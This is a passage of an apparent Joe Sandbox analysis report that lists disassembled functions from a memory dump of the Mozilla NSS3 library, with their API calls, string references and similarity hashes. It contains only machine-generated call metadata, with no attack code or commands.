                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF32
                                                              • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF5F
                                                              • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DF78
                                                              • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DFAA
                                                              Similarity
                                                              • API ID: Alloc_Util$memcpy$Valuemalloc
                                                              • String ID:
                                                              • API String ID: 1886645929-0
                                                              • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                              • Instruction ID: 73a9d011c7246688be931c55a3a83d1ce66e26d9f7526d570e4a54fdcf3f2883
                                                              • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                              • Instruction Fuzzy Hash: 6C81C4706846068BFB156A19D89037972D6EBF4340F11C43ADB19CAAEDEFFCC880C642
                                                              APIs
                                                              • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6D0E3C76
                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6D0E3C94
                                                                • Part of subcall function 6D0D95B0: TlsGetValue.KERNEL32(00000000,?,6D0F00D2,00000000), ref: 6D0D95D2
                                                                • Part of subcall function 6D0D95B0: EnterCriticalSection.KERNEL32(?,?,?,6D0F00D2,00000000), ref: 6D0D95E7
                                                                • Part of subcall function 6D0D95B0: PR_Unlock.NSS3(?,?,?,?,6D0F00D2,00000000), ref: 6D0D9605
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0E3CB2
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6D0E3CCA
                                                              • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6D0E3CE1
                                                                • Part of subcall function 6D0E3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D0FAE42), ref: 6D0E30AA
                                                                • Part of subcall function 6D0E3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D0E30C7
                                                                • Part of subcall function 6D0E3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6D0E30E5
                                                                • Part of subcall function 6D0E3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D0E3116
                                                                • Part of subcall function 6D0E3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D0E312B
                                                                • Part of subcall function 6D0E3090: PK11_DestroyObject.NSS3(?,?), ref: 6D0E3154
                                                                • Part of subcall function 6D0E3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0E317E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                              • String ID:
                                                              • API String ID: 3167935723-0
                                                              • Opcode ID: 40aa94820d5beb5cd39c94207454fa3d89bd1a4ef162c712212e451642e4b11f
                                                              • Instruction ID: bc4a4998a7c82165fc50d55b0b64b1ac60a8149726238b5a6895f929c79de37c
                                                              • Opcode Fuzzy Hash: 40aa94820d5beb5cd39c94207454fa3d89bd1a4ef162c712212e451642e4b11f
                                                              • Instruction Fuzzy Hash: EC61D871A08201AFFB105E65DC41F6BBAF9EF18785F494038FE099A2A6F761D910C7A0
                                                              APIs
                                                                • Part of subcall function 6D123440: PK11_GetAllTokens.NSS3 ref: 6D123481
                                                                • Part of subcall function 6D123440: PR_SetError.NSS3(00000000,00000000), ref: 6D1234A3
                                                                • Part of subcall function 6D123440: TlsGetValue.KERNEL32 ref: 6D12352E
                                                                • Part of subcall function 6D123440: EnterCriticalSection.KERNEL32(?), ref: 6D123542
                                                                • Part of subcall function 6D123440: PR_Unlock.NSS3(?), ref: 6D12355B
                                                              • TlsGetValue.KERNEL32 ref: 6D123D8B
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123D9F
                                                              • PR_Unlock.NSS3(?), ref: 6D123DCA
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123DE2
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D123E4F
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • TlsGetValue.KERNEL32 ref: 6D123E97
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123EAB
                                                              • PR_Unlock.NSS3(?), ref: 6D123ED6
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123EEE
                                                              Similarity
                                                              • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                              • String ID:
                                                              • API String ID: 2554137219-0
                                                              • Opcode ID: 6a879b0b111732afc830d0027f3151a6cd6b2b74f85ff8937b6328832e7f1585
                                                              • Instruction ID: 677385d6c2a2f6f6c76cb9edfccfa9fcd7e1cfe565bde9dcfe8380f4e6cd8b64
                                                              • Opcode Fuzzy Hash: 6a879b0b111732afc830d0027f3151a6cd6b2b74f85ff8937b6328832e7f1585
                                                              • Instruction Fuzzy Hash: EA515A759042018FEB125F68EC4472B73B4FF55728F06412CEE0947229EBB2E996CBD1
                                                              APIs
                                                              • PORT_ZAlloc_Util.NSS3(FA536EE9), ref: 6D0D2C5D
                                                                • Part of subcall function 6D130D30: calloc.MOZGLUE ref: 6D130D50
                                                                • Part of subcall function 6D130D30: TlsGetValue.KERNEL32 ref: 6D130D6D
                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6D0D2C8D
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D0D2CE0
                                                                • Part of subcall function 6D0D2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6D0D2CDA,?,00000000), ref: 6D0D2E1E
                                                                • Part of subcall function 6D0D2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6D0D2E33
                                                                • Part of subcall function 6D0D2E00: TlsGetValue.KERNEL32 ref: 6D0D2E4E
                                                                • Part of subcall function 6D0D2E00: EnterCriticalSection.KERNEL32(?), ref: 6D0D2E5E
                                                                • Part of subcall function 6D0D2E00: PL_HashTableLookup.NSS3(?), ref: 6D0D2E71
                                                                • Part of subcall function 6D0D2E00: PL_HashTableRemove.NSS3(?), ref: 6D0D2E84
                                                                • Part of subcall function 6D0D2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6D0D2E96
                                                                • Part of subcall function 6D0D2E00: PR_Unlock.NSS3 ref: 6D0D2EA9
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0D2D23
                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6D0D2D30
                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6D0D2D3F
                                                              • free.MOZGLUE(00000000), ref: 6D0D2D73
                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6D0D2DB8
                                                              • free.MOZGLUE ref: 6D0D2DC8
                                                                • Part of subcall function 6D0D3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0D3EC2
                                                                • Part of subcall function 6D0D3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D0D3ED6
                                                                • Part of subcall function 6D0D3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D0D3EEE
                                                                • Part of subcall function 6D0D3E60: PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D0D3F02
                                                                • Part of subcall function 6D0D3E60: PL_FreeArenaPool.NSS3 ref: 6D0D3F14
                                                                • Part of subcall function 6D0D3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D0D3F27
                                                              Similarity
                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                              • String ID:
                                                              • API String ID: 3941837925-0
                                                              • Opcode ID: 581a4e9882298c3159351dbcb47f217d9c1f02d70410e25eeae586325f63590b
                                                              • Instruction ID: 3530dd019edcbecb81065a77a0abdf7c7b2867dfbd2910f1d82f9f45c555469c
                                                              • Opcode Fuzzy Hash: 581a4e9882298c3159351dbcb47f217d9c1f02d70410e25eeae586325f63590b
                                                              • Instruction Fuzzy Hash: 8F51CD71A083129FFBA19E78DC81B2B77E5EF94708F05042AFD5987250E731E811DB92
                                                              APIs
                                                                • Part of subcall function 6D0D40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6D0D3F7F,?,00000055,?,?,6D0D1666,?,?), ref: 6D0D40D9
                                                                • Part of subcall function 6D0D40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6D0D1666,?,?), ref: 6D0D40FC
                                                                • Part of subcall function 6D0D40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6D0D1666,?,?), ref: 6D0D4138
                                                              • PR_GetCurrentThread.NSS3 ref: 6D0D7CFD
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6D1F9030), ref: 6D0D7D1B
                                                                • Part of subcall function 6D12FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6D0D1A3E,00000048,00000054), ref: 6D12FD56
                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6D1F9048), ref: 6D0D7D2F
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6D0D7D50
                                                              • PR_GetCurrentThread.NSS3 ref: 6D0D7D61
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D0D7D7D
                                                              • free.MOZGLUE(?), ref: 6D0D7D9C
                                                              • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6D0D7DB8
                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6D0D7E19
                                                              Similarity
                                                              • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                              • String ID:
                                                              • API String ID: 70581797-0
                                                              • Opcode ID: 230ccd0fb40b66082883268dd914792ab7f9612b12039e414c0370d970f7910e
                                                              • Instruction ID: 289d5d9bb247d5321565700c7e53f0e4b5b59db153a6b6cdd5a0f85faf82c221
                                                              • Opcode Fuzzy Hash: 230ccd0fb40b66082883268dd914792ab7f9612b12039e414c0370d970f7910e
                                                              • Instruction Fuzzy Hash: 9F41F472D0431A9BFB409E699C41B7F33B8AF84258F060026ED1BAB251E770E919C7A1
                                                              APIs
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6D13536F,00000022,?,?,00000000,?), ref: 6D134E70
                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6D134F28
                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6D134F8E
                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6D134FAE
                                                              • free.MOZGLUE(?), ref: 6D134FC8
                                                              Strings
                                                              Similarity
                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                              • String ID: %s=%c%s%c$%s=%s
                                                              • API String ID: 2709355791-2032576422
                                                              • Opcode ID: 5559f91079d8dc22e76adb0b1e870a202e133f700ba92fcf1c8d6dba8a9cae7c
                                                              • Instruction ID: 26f0b0d5efd1c553c44272ce09e7ae3ede8070117a84aa0998c027ddd68c5c6d
                                                              • Opcode Fuzzy Hash: 5559f91079d8dc22e76adb0b1e870a202e133f700ba92fcf1c8d6dba8a9cae7c
                                                              • Instruction Fuzzy Hash: 7E514B21A8816B8BEB01CA6DC4907FF7BF5AF5A300F0B4075E894A7349D3BB88458791
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D077E27
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D077E67
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6D077EED
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D077F2E
                                                              Strings
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 912837312-598938438
                                                              • Opcode ID: fa2a902e6272cdd16eb456df493393002f620298cbb2034c3d97d46d8872aa17
                                                              • Instruction ID: 9ad900cd448fa7be6a1cc2cbc29166d3015241ce1f89ef95eb359c6bff64fe8b
                                                              • Opcode Fuzzy Hash: fa2a902e6272cdd16eb456df493393002f620298cbb2034c3d97d46d8872aa17
                                                              • Instruction Fuzzy Hash: B961AC74E442069FEB25CF28C890B6A37A2FF89344F1584A8ED099F352D771EC51CBA5
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6D10ACE6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D10AD14
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AD23
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AD39
                                                              Strings
                                                              Similarity
                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                              • API String ID: 332880674-3521875567
                                                              • Opcode ID: 5f37273c4c6c3bd1d43055935395d3c5522efdc676cfaa70ce012f23c5f63602
                                                              • Instruction ID: 4291bf1d36ee2226683ecb0333208a77d533b4c489cf75dd1b1549cb510cc550
                                                              • Opcode Fuzzy Hash: 5f37273c4c6c3bd1d43055935395d3c5522efdc676cfaa70ce012f23c5f63602
                                                              • Instruction Fuzzy Hash: 2F2125B45001049FDB20AB65EE8CF2B33B5AB8230DF074024F6099B116DFB49845CBE2
                                                              APIs
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4DC3
                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D1A4DE0
                                                              Strings
                                                              • misuse, xrefs: 6D1A4DD5
                                                              • invalid, xrefs: 6D1A4DB8
                                                              • API call with %s database connection pointer, xrefs: 6D1A4DBD
                                                              • %s at line %d of [%.10s], xrefs: 6D1A4DDA
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A4DCB
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                              • API String ID: 632333372-2974027950
                                                              • Opcode ID: 5446cd921d759ab0f52cf5cbec37515365e4cd41bdcc811f90209f908d0a4c68
                                                              • Instruction ID: d63dcabf6c6f4b6e6db6d2997ac41de91deedd8544a0ee3767d507916ea4e1a0
                                                              • Opcode Fuzzy Hash: 5446cd921d759ab0f52cf5cbec37515365e4cd41bdcc811f90209f908d0a4c68
                                                              • Instruction Fuzzy Hash: ECF05919E4862D2BEB005014DC21FB23B955F39324F4A00B0FE0CBB157DA4598408280
                                                              APIs
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4E30
                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D1A4E4D
                                                              Strings
                                                              • misuse, xrefs: 6D1A4E42
                                                              • invalid, xrefs: 6D1A4E25
                                                              • API call with %s database connection pointer, xrefs: 6D1A4E2A
                                                              • %s at line %d of [%.10s], xrefs: 6D1A4E47
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A4E38
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                              • API String ID: 632333372-2974027950
                                                              • Opcode ID: 3abe27a38286937e86b8577354c4444e9e74ec7028f69bc63b27432ae5f76d0a
                                                              • Instruction ID: 5122d86eecb9a25e97e2fabeacfa4dd105ad3dd8d3c86f550e507feb0573b653
                                                              • Opcode Fuzzy Hash: 3abe27a38286937e86b8577354c4444e9e74ec7028f69bc63b27432ae5f76d0a
                                                              • Instruction Fuzzy Hash: 91F02719EC8A2D2BEB105028DC25FF337C59B39322F4E00B1EB1D67297DB8D9C605291
                                                              APIs
                                                              • PR_SetError.NSS3(00000000,00000000,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?,?,00000000,?,?), ref: 6D110CB3
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?), ref: 6D110DC1
                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?), ref: 6D110DEC
                                                                • Part of subcall function 6D130F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6D0D2AF5,?,?,?,?,?,6D0D0A1B,00000000), ref: 6D130F1A
                                                                • Part of subcall function 6D130F10: malloc.MOZGLUE(00000001), ref: 6D130F30
                                                                • Part of subcall function 6D130F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D130F42
                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110DFF
                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6D111444,?,00000001,?,00000000), ref: 6D110E16
                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110E53
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?,?,6D111444,?,?,00000000), ref: 6D110E65
                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D111444,?,00000001,?,00000000,00000000,?), ref: 6D110E79
                                                                • Part of subcall function 6D121560: TlsGetValue.KERNEL32(00000000,?,6D0F0844,?), ref: 6D12157A
                                                                • Part of subcall function 6D121560: EnterCriticalSection.KERNEL32(?,?,?,6D0F0844,?), ref: 6D12158F
                                                                • Part of subcall function 6D121560: PR_Unlock.NSS3(?,?,?,?,6D0F0844,?), ref: 6D1215B2
                                                                • Part of subcall function 6D0EB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6D0F1397,00000000,?,6D0ECF93,5B5F5EC0,00000000,?,6D0F1397,?), ref: 6D0EB1CB
                                                                • Part of subcall function 6D0EB1A0: free.MOZGLUE(5B5F5EC0,?,6D0ECF93,5B5F5EC0,00000000,?,6D0F1397,?), ref: 6D0EB1D2
                                                                • Part of subcall function 6D0E89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6D0E88AE,-00000008), ref: 6D0E8A04
                                                                • Part of subcall function 6D0E89E0: EnterCriticalSection.KERNEL32(?), ref: 6D0E8A15
                                                                • Part of subcall function 6D0E89E0: memset.VCRUNTIME140(6D0E88AE,00000000,00000132), ref: 6D0E8A27
                                                                • Part of subcall function 6D0E89E0: PR_Unlock.NSS3(?), ref: 6D0E8A35
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                              • String ID:
                                                              • API String ID: 1601681851-0
                                                              • Opcode ID: 87fd0f849d18f01d86e20ca50288f459c552c3ada5fb1ff2d09dda5841d192ec
                                                              • Instruction ID: 857d3cec6e3ef146f2c79fce549c54b081adfff3573dfec4909c0f8469b21ab5
                                                              • Opcode Fuzzy Hash: 87fd0f849d18f01d86e20ca50288f459c552c3ada5fb1ff2d09dda5841d192ec
                                                              • Instruction Fuzzy Hash: 6651C3F6D082015FFB109F65DC81A7B37A8AF55258F160074FD099B316FBB2ED2186A2
                                                              APIs
                                                                • Part of subcall function 6D0E8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6D0F0715), ref: 6D0E8859
                                                                • Part of subcall function 6D0E8850: PR_NewLock.NSS3 ref: 6D0E8874
                                                                • Part of subcall function 6D0E8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6D0E888D
                                                              • PR_NewLock.NSS3 ref: 6D0E9CAD
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • TlsGetValue.KERNEL32 ref: 6D0E9CE8
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D01
                                                              • TlsGetValue.KERNEL32(?,?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D38
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0EECEC,6D0F2FCD,00000000,?,6D0F2FCD,?), ref: 6D0E9D4D
                                                              • PR_Unlock.NSS3 ref: 6D0E9D70
                                                              • PR_Unlock.NSS3 ref: 6D0E9DC3
                                                              • PR_NewLock.NSS3 ref: 6D0E9DDD
                                                                • Part of subcall function 6D0E88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D0F0725,00000000,00000058), ref: 6D0E8906
                                                                • Part of subcall function 6D0E88D0: EnterCriticalSection.KERNEL32(?), ref: 6D0E891A
                                                                • Part of subcall function 6D0E88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6D0E894A
                                                                • Part of subcall function 6D0E88D0: calloc.MOZGLUE(00000001,6D0F072D,00000000,00000000,00000000,?,6D0F0725,00000000,00000058), ref: 6D0E8959
                                                                • Part of subcall function 6D0E88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8993
                                                                • Part of subcall function 6D0E88D0: PR_Unlock.NSS3(?), ref: 6D0E89AF
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                              • String ID:
                                                              • API String ID: 3394263606-0
                                                              • Opcode ID: 51923372f8dca760fe99a28bf1ef0cf4e04c524942ab612be4331cc0c05c7731
                                                              • Instruction ID: 146ed361452c4f5721ff6f198b8e5f7913c3377a1a831eb3d4c6c1fc022f818c
                                                              • Opcode Fuzzy Hash: 51923372f8dca760fe99a28bf1ef0cf4e04c524942ab612be4331cc0c05c7731
                                                              • Instruction Fuzzy Hash: CD5142B4A087168FEB01EF68D58476EBBF4BF44394F068529D998DB314E770E880CB91
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,?,6D14460B,?,?), ref: 6D0D3CA9
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0D3CB9
                                                              • PL_HashTableLookup.NSS3(?), ref: 6D0D3CC9
                                                              • SECITEM_DupItem_Util.NSS3(00000000), ref: 6D0D3CD6
                                                              • PR_Unlock.NSS3 ref: 6D0D3CE6
                                                              • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6D0D3CF6
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0D3D03
                                                              • PR_Unlock.NSS3 ref: 6D0D3D15
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              Memory Dump Source
